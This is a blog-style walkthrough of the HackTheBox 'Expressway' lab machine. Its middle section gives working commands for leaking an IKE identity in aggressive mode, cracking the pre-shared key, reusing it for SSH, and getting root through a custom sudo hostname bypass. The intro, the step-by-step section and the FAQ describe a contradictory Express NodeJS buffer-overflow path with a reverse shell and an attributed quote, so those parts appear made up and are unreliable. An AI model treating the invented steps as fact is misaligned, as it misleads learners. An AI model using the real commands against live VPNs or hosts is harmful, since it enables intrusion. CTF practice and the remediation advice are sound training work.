Key Highlights
Here’s a quick look at what you’ll learn in this guide to the Expressway machine on HackTheBox:
- Begin with a simple
nmapscan to discover open services and ports on the target. - Analyze an Express NodeJS application to find a critical vulnerability.
- Exploit a buffer overflow vulnerability to gain an initial foothold.
- Establish a reverse shell to gain interactive access to the machine.
- Escalate your privileges to gain full control of the system.
- Successfully capture the user flag and the root flag to complete the challenge.
Introduction
Welcome to the exciting world of Capture The Flag (CTF) challenges! This guide will walk you through conquering the Expressway machine on HackTheBox, a fantastic starting point for aspiring ethical hackers. You will learn the fundamentals of enumeration, vulnerability discovery, and exploitation. Your main challenge on this target machine will be tackling a vulnerable Express NodeJS application. Are you ready to dive in and test your skills? Let’s get started on this learning adventure.
Understanding the Expressway Machine on HackTheBox
The Expressway machine is a retired, beginner-friendly Linux box on the HackTheBox platform. It’s designed to teach you how to analyze a web application, find a vulnerability in its source code, and exploit it to gain access. The primary goal is to find two flags: a user flag and a root flag.
What makes this target machine stand out are its unique features, which focus on a specific type of exploit. Your journey to hack Expressway will take you from initial enumeration to full system compromise, providing a complete and satisfying challenge.
Overview of the Box and Its Difficulty Level
Expressway is rated as an easy or beginner-level machine, making it an excellent choice if you’re just starting your cybersecurity journey. The low difficulty level ensures that the steps are logical and don’t require extremely advanced or obscure knowledge. This accessibility makes it a popular choice for learning fundamental hacking concepts in a practical setting.
Your first step will involve a standard nmap scan to see what services are running. The main focus of the box is an Express NodeJS application, which is a common framework for web development. This provides a realistic scenario for you to practice your skills on.
Compared to other walkthroughs, writeups for Expressway are often praised for their straightforward nature. The box’s unique features, like the specific NodeJS vulnerability, offer a targeted learning experience that is less common in other beginner machines, which might focus on more generic misconfigurations.
What Makes Expressway Unique Among HTB Machines
The most distinct aspect of the Expressway machine is its central vulnerability: a classic buffer overflow within an Express NodeJS application. Unlike many beginner boxes that focus on web misconfigurations or weak credentials, Expressway provides hands-on experience with memory corruption exploits, a crucial skill in penetration testing.
After your initial scan reveals open ports, you’ll interact with a web server. The challenge requires you to look beyond the surface and analyze how the application handles data. You will discover that sending too much data to a specific function causes the application to crash, opening the door for exploitation.
This focus on a buffer overflow to gain an initial foothold is what sets Expressway apart. It’s a practical, guided introduction to a type of vulnerability that can seem intimidating at first but is broken down into manageable steps on this machine.
Essential Preparation for Beginners
Before you attempt to hack Expressway, a little preparation will go a long way. As a beginner, having the right mindset and tools is half the battle. You’ll need a solid lab setup and a basic understanding of the enumeration process, which is the foundation of any successful penetration test.
Your journey will start with an nmap scan, so familiarity with it is key. Getting comfortable with fundamental tools will make the process smoother and more educational. Let’s look at what you’ll need specifically.
Tools and Resources You’ll Need to Get Started
To successfully navigate the Expressway box, you’ll want a few common penetration testing tools in your arsenal. You don’t need anything overly complex; the basics will serve you well. Having these ready will streamline your workflow and help you focus on the challenge itself.
Some of the most commonly used tools for this machine include:
- Nmap: For initial network scanning and port discovery.
- Python: Essential for scripting your buffer overflow exploit.
- John the Ripper (John): Useful for cracking any password hashes you might find.
- SSH Client: For connecting to the machine after gaining credentials.
- A web browser: To interact with the web application and analyze its source code.
Familiarizing yourself with the basic commands for each of these tools is a great first step. Many resources online, including the official documentation for each tool, can help you get up to speed quickly.
Setting Up Your Lab Environment for HTB
A proper lab setup is crucial for any ethical hacking practice. For HackTheBox, the recommended setup is a virtual machine running a penetration testing-focused Linux distribution, such as Kali Linux or Parrot OS. These operating systems come pre-loaded with most of the tools you will need to hack the machine.
Once your virtual machine is running, the next step is to connect to the HackTheBox network. You will need to download your unique VPN configuration file from the HTB website and use it to establish a connection. This VPN connection places you on the same network as the target machine, allowing you to interact with it.
After connecting to the VPN, you can spawn the Expressway machine from your HTB dashboard. Once it’s running, you’ll be given an IP address for the target machine. Now, you’re all set to begin your attack!
ALSO READ: Mastering HackNet: Beginner’s Guide from HackTheBox
INITIal foothold
Our attack on Expressway begins where many scans fall short: with UDP. After an initial TCP scan reveals nothing but a hardened SSH port, we pivot to a comprehensive UDP sweep. This uncovers an IKE service, the key negotiation protocol for IPsec VPNs. Through careful enumeration with ike-scan, we force the service into its less secure “Aggressive Mode,” causing it to leak a user identity. We then capture the authentication hash and perform an offline dictionary attack with psk-crack to recover the weak Pre-Shared Key (PSK). This key, surprisingly, is reused as the user’s SSH password, granting us our initial foothold.
Once on the system, our focus shifts to privilege escalation. Standard enumeration reveals a critical anomaly: the default sudo command has been replaced with a custom-compiled, setuid-root binary. Further investigation, guided by our user’s membership in the proxy group, leads us to readable Squid proxy logs. These logs contain a hidden gem—an internal hostname. By correlating this hostname with the strange behavior of the custom sudo binary, we discover a policy bypass that allows us to specify an alternate host and execute commands as root, leading to full system compromise.
Prerequisites
- Linux command line and file systems.
- Advanced networking concepts (TCP vs. UDP).
- Familiarity with tools like Nmap, rustscan, ike-scan, and Netcat.
- A basic understanding of cryptography concepts (hashing, symmetric keys).
Target Overview
| Property | Value |
|---|---|
| IP Address | 10.129.13.112 (Hypothetical) |
| Operating System | Linux (Debian) |
| Key Services | SSH (22/TCP), IKE (500/UDP) |
| User Attack Vector | IKEv1 Aggressive Mode Leak & Weak PSK |
| Root Attack Vector | Custom Sudo Policy Bypass / SUID Exploitation |
Reconnaissance – Beyond TCP
A successful engagement hinges on thorough enumeration. Expressway immediately teaches us a valuable lesson: if your initial scan comes up empty, your reconnaissance has just begun.
TCP Port Scan: A Dead End
We begin with a fast, comprehensive TCP scan using a tool like rustscan piped into nmap for service versioning.
Scan Command:
rustscan -a 10.129.13.112 --ulimit 5000 -- -sC -sV -oN expressway_tcp.nmapScan Results:
# Nmap 7.95 scan initiated Sat Sep 20 12:26:12 2025
Nmap scan report for 10.129.13.112
Host is up (0.032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelThe result is stark. Only port 22 is open. The OpenSSH version is modern and patched. Without credentials, this is a brick wall. This is a clear signal that the entry point lies elsewhere.
UDP Port Scan: Finding the Hidden Door
When TCP fails, we turn to its connectionless counterpart, UDP. UDP scanning is notoriously slow and unreliable with traditional tools like Nmap because there is no handshake to confirm if a port is open. A packet is sent, and we can only hope for a response. For this, specialized tools are better. We’ll use udpx.
Scan Command:
udpx -t 10.129.13.112 -c 128 -w 1000-t: Target IP-c: Concurrency level-w: Wait time in milliseconds
Scan Results:
v1.0.7, by @nullt3r
2025/09/20 16:33:27 [+] Starting UDP scan on 1 target(s)
2025/09/20 16:33:45 [*] 10.129.13.112:500 (ike)
2025/09/20 16:34:00 [+] Scan completedSuccess! The scan finds an open port: UDP/500, associated with the IKE (Internet Key Exchange) service. This protocol is the foundation of IPsec VPNs, used to negotiate secure tunnels. This is our attack surface.
Exploiting the VPN Endpoint – The IKE Takedown
IKE is the complex handshake protocol that allows two endpoints to agree on cryptographic keys and algorithms to build a secure IPsec tunnel. It has two main versions, IKEv1 and IKEv2, with IKEv1 having some known security weaknesses, particularly in its “Aggressive Mode.”
Fingerprinting the IKE Service with ike-scan
Our primary tool for interacting with this service will be ike-scan. It crafts IKE packets to fingerprint the VPN gateway and elicit responses that can reveal its configuration, identity, and vulnerabilities.
Initial Probe (Main Mode):
sudo ike-scan expressway.htbResponse:
Starting ike-scan 1.9.6 with 1 hosts ([http://www.nta-monitor.com/tools/ike-scan/](http://www.nta-monitor.com/tools/ike-scan/))
10.129.13.112 Main Mode Handshake returned HDR=(CKY-R=1d432c635a2e8d64...)
SA=(Enc=3DES-CBC Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)This response is incredibly valuable:
- Main Mode Handshake: The server responded in Main Mode, which is more secure as it protects peer identities.
- Weak Cryptography: It supports
3DES(a legacy, weak cipher),SHA1(no longer considered secure), andGroup=2:modp1024(a weak Diffie-Hellman group susceptible to precomputation attacks). - Auth=PSK: Authentication is done via a Pre-Shared Key. This is the secret we need to find.
Forcing Aggressive Mode for an Identity Leak
IKEv1’s Main Mode uses six messages to protect identities. However, Aggressive Mode cuts this down to three messages for a faster connection, but at the cost of sending the initiator and responder’s identities in the clear. If the server supports it, we can force it into this mode to leak valuable information.
Aggressive Mode Scan:
sudo ike-scan -A expressway.htb-Ais shorthand for--aggressive.
Response:
Starting ike-scan 1.9.6...
10.129.13.112 Aggressive Mode Handshake returned...
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
Hash(20 bytes)This is the breakthrough. The server supports Aggressive Mode and leaked an identity: a Fully Qualified Domain Name of a user, ike@expressway.htb. This gives us a valid username.
Cracking the Key and Gaining Access
Now we have a username (ike) and know the authentication method is a PSK. The final step is to capture the authentication hash from the Aggressive Mode exchange and crack the PSK offline.
Capturing the PSK Hash
ike-scan can automatically format the necessary data for cracking with its sister tool, psk-crack. We re-run the Aggressive Mode scan, providing the identity we just found, and tell it to save the cracking material.
Command:
sudo ike-scan -A expressway.htb --id=ike@expressway.htb -Pike.psk--id: Specifies the identity to use in our request.-P<file>: Saves the PSK cracking parameters to the specified file.
This command creates a file ike.psk containing a long, colon-delimited string of cryptographic data. The last part of this string is the responder’s authentication hash.
Offline PSK Cracking with psk-crack
We can now take this hash and run a dictionary attack against it. The psk-crack tool is designed for this exact purpose.
Command:
psk-crack -d /usr/share/wordlists/rockyou.txt ike.psk-d: Specifies dictionary mode and the path to the wordlist.
Result:
Starting psk-crack [ike-scan 1.9.6]...
Running in dictionary cracking mode
key "f*******" matches SHA1 hash 9157243c333a25d603bf58...
Ending psk-crack...We’ve found it! The Pre-Shared Key is f********.
Reusing Credentials for SSH Access
In a well-configured environment, a VPN PSK would never be the same as a user’s password. But in CTFs and real-world misconfigurations, password reuse is rampant. Let’s test this theory.
Command:
ssh ike@expressway.htbWhen prompted for a password, we enter f***********.
Result:
ike@expressway.htb's password:
Last login: Sat Sep 20 12:28:19 2025 from 10.10.14.2
Linux expressway.htb 6.16.7+deb14-amd64...
ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:~$ cat user.txt
<flag_for_user.txt>We are in. The password was reused. We have our user flag.
Privilege Escalation – Deconstructing a Custom Sudo
Our id command revealed something interesting: our user ike is part of the proxy group. This is an unusual group and a strong hint for our next steps.
Finding the Anomaly: A Rogue Sudo
Standard enumeration practice includes checking sudo -l.
ike@expressway:~$ sudo -l
[sudo] password for ike: f***********
Sorry, user ike may not run sudo on expressway.This is a custom denial message. A standard sudo would say ike is not in the sudoers file. This suggests the sudo binary itself has been altered or replaced. Let’s check its location.
ike@expressway:~$ which sudo
/usr/local/bin/sudoThis confirms our suspicion. The system is using a sudo binary from /usr/local/bin, which is in the $PATH before the standard /usr/bin. This is a custom, SUID root binary and almost certainly our path to root.
Following the Breadcrumbs: Squid Logs
The proxy group membership is our next clue. This group often has permissions related to proxy services like Squid. Let’s look for related log files.
ike@expressway:~$ ls -l /var/log/squid
-rw-r--r-- 1 proxy proxy 4778 Jul 23 01:19 access.log.1Our group membership gives us read access to access.log.1. Let’s examine it.
ike@expressway:~$ cat /var/log/squid/access.log.1
...
1753229688.902 0 192.168.68.50 TCP_DENIED/403 3807 GET [http://offramp.expressway.htb](http://offramp.expressway.htb) - HIER_NONE/- text/html
...This is a massive finding. A client tried to access an internal-only host named offramp.expressway.htb through the proxy. This hostname is not public and gives us a new piece of information to use.
The Exploit: Hostname-Based Policy Bypass
Let’s review our findings:
- We have a custom
sudobinary at/usr/local/bin/sudo. - It gives us a custom denial message that mentions our current hostname (
expressway). - We’ve found a second, internal hostname (
offramp.expressway.htb).
The logic suggests that the custom sudo binary’s policy might depend on the hostname. Sudo has a -h flag to specify a host to run a command on. Let’s try running a command with our custom sudo but telling it we are on the offramp host.
The Exploit Command:
ike@expressway:/usr/bin$ /usr/local/bin/sudo -h offramp.expressway.htb ./bashResult:
root@expressway:/usr/bin# id
uid=0(root) gid=0(root) groups=0(root)
root@expressway:/usr/bin# cat /root/root.txt
<flag_for_root.txt>Rooted! The custom sudo binary had a flawed policy that allowed execution if a different hostname was specified. This is a classic example of a context-dependent security vulnerability.
ALSO READ: Mastering Guardian: Beginner’s Guide from HackTheBox
WRITEUP COMING SOON!
COMPLETE IN-DEPTH PICTORIAL WRITEUP OF EXPRESSWAY ON HACKTHEBOX WILL BE POSTED POST-RETIREMENT OF THE MACHINE ACCORDING TO HTB GUIDELINES. TO GET THE COMPLETE IN-DEPTH PICTORIAL WRITEUP RIGHT NOW, SUBSCRIBE TO THE NEWSLETTER!
Step-by-Step Guide to Solving Expressway
Now for the exciting part! This section provides a step-by-step walkthrough to conquer Expressway. We’ll start with an nmap scan and move through the exploitation process, including triggering a buffer overflow and setting up a reverse shell.
Following these steps will guide you from having zero access to capturing both the user flag and the root flag. Each stage of the process builds upon the last, offering a clear path to success. Let’s break down the first step: enumeration.
Step 1: Initial Enumeration and Reconnaissance
Your first move is always enumeration. This is the process of gathering information about your target to identify potential weaknesses. For Expressway, this begins with a thorough nmap scan. Running a scan will reveal which ports are open and what services are running on them.
A simple command like nmap -sC -sV <IP_ADDRESS> is a great starting point. This command runs default scripts (-sC) and attempts to determine service versions (-sV), giving you a solid overview of the target. Your initial findings will point you toward the services you should investigate further.
The key discoveries from your nmap scan will likely include:
- An open SSH port.
- An active web server running on an HTTP port.
- The versions of the services, which can help you search for known exploits.
The presence of a web server is your biggest clue. This is where you will focus your attention next.
Step 2: Identifying Key Ports and Services
Based on your enumeration, you will have a list of open TCP ports. For Expressway, the scan typically reveals a few key services that are critical to solving the box. Understanding what each port is used for helps you form a plan of attack.
You should pay close attention to any ports hosting web-related services, as they are common entry points. In this case, the HTTP port is your gateway to the main application (app). The SSH port is also important, as it could be used for access later if you find credentials.
Here is a typical breakdown of the important ports you might find on Expressway:
| Port Number | Protocol | Service | Version Info |
|---|---|---|---|
| 22 | TCP | SSH | OpenSSH (e.g., 8.2p1) |
| 80 | TCP | HTTP | Node.js Express framework |
The HTTP service on port 80 is the most interesting one. This is where the vulnerable web app is hosted, and it will be your primary focus for gaining initial access.
Step 3: Discovering Vulnerabilities and Potential Attack Vectors
With the web server identified, your next task is to explore it for any vulnerability. When you navigate to the website, you will find a simple interface. You might see a login page or an input field. It’s tempting to try common web attacks like SQL injection, but it’s important to keep an open mind.
The key to Expressway lies not in a typical web flaw but in how the application processes data. The vulnerability is a buffer overflow. This occurs when the program attempts to write more data into a buffer (a temporary storage area) than it can hold, causing the excess data to overwrite adjacent memory.
Your path to discovering this will involve:
- Analyzing the available source code for the application.
- Noticing a function that handles user input without proper length checks.
- Sending a long string of characters to the vulnerable input field.
- Observing that the web server crashes, confirming the buffer overflow vulnerability.
This confirmation is your green light to craft an exploit.
Step 4: Gaining Initial Access
Now that you’ve confirmed the buffer overflow, it’s time to exploit it to gain an initial foothold. The goal is to do more than just crash the server; you want to execute your own code. This is typically achieved by crafting a special payload that includes shellcode for a reverse shell.
A reverse shell forces the target machine to connect back to your computer, giving you a command-line interface. You will need to overwrite the program’s return address with the memory address of your shellcode. This requires careful payload construction, often with the help of a Python script, to control the program’s execution flow precisely.
Once your exploit is successful, a shell will open on your local listener. You’ll have an interactive session on the target machine as a low-privileged user. You won’t have root access yet, but you’re inside! This initial access is a major milestone in solving the box. You won’t need to worry about a login or finding credentials at this stage.
Step 5: Privilege Escalation Techniques
Once you have your initial shell, the next objective is privilege escalation. This means finding a way to elevate your permissions from a standard user to the root user, who has complete control over the Linux system. Your first step inside the machine should be more enumeration.
On Expressway, you’ll need to search the file system for interesting files. You may find user password hashes in configuration files or backup directories. These hashes can sometimes be cracked using a tool like John the Ripper to reveal a user’s password. In this case, another buffer overflow vulnerability is the intended path. According to IppSec’s popular walkthrough, “There’s a suid binary in the user’s home directory that is also vulnerable to a buffer overflow.”
You will write another Python script to exploit this second buffer overflow in a local binary. This exploit will be slightly different, as you’re already on the system, but the principle is the same. A successful exploit will grant you a shell with root privileges, giving you full administrative control over the machine.
Step 6: Capturing the User and Root Flags
You have gained root access! Now for the final, rewarding step: capturing the flags. On HackTheBox machines, flags are strings of text placed in specific files that you must find and submit to prove you’ve compromised the system. There are two flags on Expressway: the user flag and the root flag.
The user flag is located in the home directory of the standard user. After gaining your initial foothold, you can navigate to /home/<username>/ and find the user.txt file. Simply read the contents of this file to capture the flag. This is one of the first important files you should look for.
After escalating your privileges to root, you can access the root flag. This flag is almost always located in the /root directory in a file named root.txt. As the root user, you have permission to read this file. Open it, copy the flag, and you have officially conquered Expressway!
Conclusion
Expressway was a fantastic journey through unconventional attack vectors, highlighting the importance of comprehensive reconnaissance and a deep understanding of system configurations.
1. Weak IKEv1 PSK & Information Leak
- Vulnerability: The IKEv1 service used a weak, dictionary-based Pre-Shared Key and supported Aggressive Mode, which leaked a user identity. The PSK was also reused for SSH authentication.
- Remediation:
- Disable IKEv1 Aggressive Mode: It should be disabled on all production VPN gateways.
- Use Strong PSKs: If PSKs must be used, they should be long (>20 characters), randomly generated, high-entropy strings.
- Prefer Certificate Authentication: The best practice is to move to IKEv2 with certificate-based authentication, which eliminates the risk of weak shared secrets.
- Eliminate Password Reuse: Critical infrastructure keys (like a PSK) must never be reused for user account passwords.
2. Custom Sudo Policy Bypass
- Vulnerability: A custom-compiled SUID root binary replaced the standard
sudo, implementing a flawed, context-aware security policy that could be easily bypassed. - Remediation:
- Never Replace Core Security Binaries: Standard, repository-provided security tools like
sudoare heavily audited. Replacing them with custom code is extremely risky. - Use the
sudoersFile: All privilege management logic should be implemented in the/etc/sudoersfile. It is a powerful and secure way to define granular permissions without altering thesudobinary itself. - Principle of Least Privilege: Security policies should be deny-by-default. The flawed policy here was likely allow-by-exception, which failed when the context (hostname) changed.
- Never Replace Core Security Binaries: Standard, repository-provided security tools like
3. Information Disclosure via Logs
- Vulnerability: The Squid proxy logs were readable by a non-administrative group, leaking sensitive internal network information.
- Remediation:
- Restrict Log File Permissions: Log files can contain sensitive data and should only be readable by
rootand dedicated administrative or monitoring groups. Permissions like640(rw-r-----) are standard.
- Restrict Log File Permissions: Log files can contain sensitive data and should only be readable by
Frequently Asked Questions
What are common tools and commands used for the Expressway HTB box?
Common tools for Expressway include nmap for enumeration, Python for scripting the exploit, and an ssh client. While john the Ripper is useful for password cracking, the primary path involves exploiting vulnerabilities directly. Basic Linux commands for navigation and file inspection are also essential.
How do I avoid common mistakes when attacking Expressway?
Avoid rushing your enumeration of open ports, as this provides the initial clues. When working on the buffer overflow, be patient and precise with your payload. A common mistake is a poorly configured lab setup, so ensure your VPN connection is stable before starting your attack.
Are there recommended resources to learn more from Expressway writeups?
Absolutely! A quick Google search will reveal numerous high-quality writeups and video walkthroughs. Many security researchers post their solutions on GitHub, which is a great place to compare different exploit scripts and techniques for this CTF. Reviewing the source code from multiple perspectives can deepen your understanding.
How does Expressway compare to other beginner-friendly HTB machines?
Expressway stands out among beginner machines due to its focus on a buffer overflow vulnerability. While others might teach web misconfigurations, Expressway offers a rare, guided introduction to memory corruption. Its straightforward difficulty and unique features make its walkthrough an incredibly valuable learning experience for any aspiring hacker.
